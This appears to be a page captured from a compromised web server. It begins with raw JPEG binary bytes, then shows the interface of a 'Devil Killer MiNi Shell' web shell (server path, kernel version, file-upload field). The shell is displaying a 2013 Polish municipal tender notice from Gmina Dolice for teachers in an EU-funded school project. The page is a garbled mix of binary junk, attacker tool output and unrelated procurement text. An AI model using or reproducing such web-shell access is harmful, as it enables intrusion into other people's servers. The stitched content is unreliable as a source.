JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130920/383262-N-2013.html

<p class="kh_header"><b>Dolice: Prowadzenie zajęć w ramach projektu pn. Wiem, rozumiem, potrafię</b><br>
<b>Numer ogłoszenia: 383262 - 2013; data zamieszczenia: 20.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dolice , ul. Ogrodowa 16, 73-115 Dolice, woj. zachodniopomorskie, tel. 091 5640129, faks 091 5640237.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć w ramach projektu pn. Wiem, rozumiem, potrafię.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wyłonienie: nauczycieli matematyki, nauczycieli przyrody, nauczycieli zajęć usprawniających czytanie, pisanie oraz rozumowanie, nauczycieli zajęć z wykorzystania wiedzy w praktyce i umiejętności korzystania z informacji, logopedy, nauczyciela gimnastyki korekcyjnej, psychologa, pedagoga, nauczycieli języka angielskiego oraz doradcy zawodowego w ramach projektu pn. Wiem, rozumiem, potrafię w ramach Priorytetu IX. Poddziałania 9.1.2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie przed upływem terminu  składania ofert wadium na rzecz Urzędu Gminy Dolice, ul Ogrodowa 16, 73-115 Dolice, w wysokości 6528,00 zł na całość zamówienia objętego przetargiem, lub w przypadku składania oferty częściowej odpowiednio:
1.	326,40 zł	dla części 1 zamówienia
2.	326,40 zł	dla części 2 zamówienia
3.	326,40 zł	dla części 3 zamówienia
4.	326,40 zł	dla części 4 zamówienia
5.	163,20 zł	dla części 5 zamówienia
6.	163,20 zł	dla części 6 zamówienia
7.	163,20 zł	dla części 7 zamówienia
8.	163,20 zł	dla części 8 zamówienia
9.	326,40 zł	dla części 9 zamówienia
10.	326,40 zł	dla części 10 zamówienia
11.	326,40 zł	dla części 11 zamówienia
12.	326,40 zł	dla części 12 zamówienia
13.	326,40 zł	dla części 13 zamówienia
14.	326,40 zł	dla części 14 zamówienia
15.	326,40 zł	dla części 15 zamówienia
16.	326,40 zł	dla części 16 zamówienia
17.	435,20 zł	dla części 17 zamówienia
18.	217,60 zł	dla części 18 zamówienia
19.	217,60 zł	dla części 19 zamówienia
20.	217,60 zł	dla części 20 zamówienia
21.	163,20 zł	dla części 21 zamówienia
22.	163,20 zł	dla części 22 zamówienia
23.	163,20 zł	dla części 23 zamówienia
24.	163,20 zł	dla części 24 zamówienia
25.	217,60 zł	dla części 25 zamówienia

Wykonawca, który nie wniesie wadium lub wniesie niezgodnie z wymaganiami określonymi w ustawie Pzp. i siwz zostanie wykluczony z postępowania o udzielenie zamówienia.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a)  pieniądzu;
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowe z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)  gwarancjach bankowych;
d)  gwarancjach ubezpieczeniowych;
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5  pkt 2  ustawy z dnia  9 listopada  2000r.  o  utworzeniu  Polskiej  Agencji   Rozwoju  Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz. 275).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem -   na rachunek bankowy zamawiającego w Pyrzycko-Stargardzkim Banku Spółdzielczym oddział Dolice, nr  78 9387 1026 2600 0358 2000 0030.
4.	Wadium w postaci dokumentu należy złożyć w formie oryginału w pokoju 15 Urzędu Gminy w Dolicach, ul. Ogrodowa 16. Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie oraz powinna podlegać prawu polskiemu i być realizowana w Polsce.
Uwaga -   termin ważności gwarancji nie może być krótszy niż termin związania ofertą ,  tj. 30 dni. 
5.	Kopię dowodu wniesienia wadium należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr I do Specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by osoby realizujące zadania  posiadali wykształcenie i kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. Nr 50. poz. 400 z późn. zm.). 

Zamawiający wymaga by osoby realizująca zadania posiadały wykształcenie wyższe z przygotowaniem do prowadzenia  poszczególnych zajęć.

Zamawiający wymaga by osoba realizująca zadanie doradcy zawodowego posiadała umiejętności trenerskie (na podstawie np. zaświadczeń o ukończonych kursach)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób przewidzianych do realizacji zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dolice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dolice, ul. Ogrodowa 16, 73-115 Dolice, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 14:00, miejsce: Urząd Gminy Dolice, ul. Ogrodowa 16, 73-115 Dolice, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn. Wiem, rozumiem, potrafię w ramach Priorytetu IX. Poddziałania 9.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NAUCZYCIEL MATEMATYKI W SP W DOBROPOLU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z matematyki w szkole podstawowej w Dobropolu 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z matematyki w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.
Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NAUCZYCIEL MATEMATYKI W SP W DOLICACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z matematyki w szkole podstawowej w Dolicach, w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z matematyki w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NAUCZYCIEL MATEMATYKI W SP W SĄDOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z matematyki w szkole podstawowej w Sądowie w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z matematyki w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> NAUCZYCIEL MATEMATYKI W SP W RZEPLINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z matematyki w szkole podstawowej w  Rzeplinie w wymiarze 204 h zegarowych w całym okresie trwania projektu. Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z matematyki w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu.. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  raz w tygodniu po 1 godzinie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> NAUCZYCIEL PRZYRODY W SP W DOBROPOLU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z przyrody w szkole podstawowej w Dobropolu w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z przyrody w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> NAUCZYCIEL PRZYRODY W SP W DOLICACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z przyrody w szkole podstawowej w Dolicach, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, metoda projektów, burza mózgów, pokaz - demonstracje, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z przyrody w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
